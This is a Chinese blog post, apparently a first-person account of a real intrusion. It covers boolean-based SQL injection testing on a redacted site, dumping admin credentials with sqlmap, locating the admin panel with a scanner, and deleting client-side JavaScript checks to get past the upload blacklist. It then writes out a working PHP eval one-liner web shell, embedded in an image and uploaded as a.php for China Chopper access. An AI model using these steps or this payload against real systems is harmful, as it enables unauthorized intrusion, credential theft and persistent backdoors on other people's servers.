记录一次实战,注入+本地JS绕过拿shell

1.找注入点
在这里插入图片描述
2.测试是否有注入:
http://xxxxxx/xxxx.php?id=6’ ,没有回显
在这里插入图片描述
输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2,没有回显
说明存在注入。
3. 使用sqlmap跑。
sqlmap.py -u “http://xxxxx/xxxx.php?id=6”
在这里插入图片描述
发现有注入,然后使用–dbs,–tables,–columns,–dump找出用户名和密码。

4.使用御剑扫描后台。然后进行登录。
在这里插入图片描述
我们先上传一个脚本木马试试。
在这里插入图片描述
发现有黑名单。先看下是否是本地js校验。右键
——审查元素,发现是本地js校验。
在这里插入图片描述
我们找到表单form,删除相对应的脚本。
在这里插入图片描述
5.重新上传php一句话,发现
在这里插入图片描述
那么试下图片马
6.将图片使用C32Asm打开,在最后面添加一句话:<?php @ eval ( $_POST [ 'pw' ]); ?>
在这里插入图片描述
在这里插入图片描述
保存,命名为a.php。
然后上传,发现上传成功,使用菜刀连接,密码pw。
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值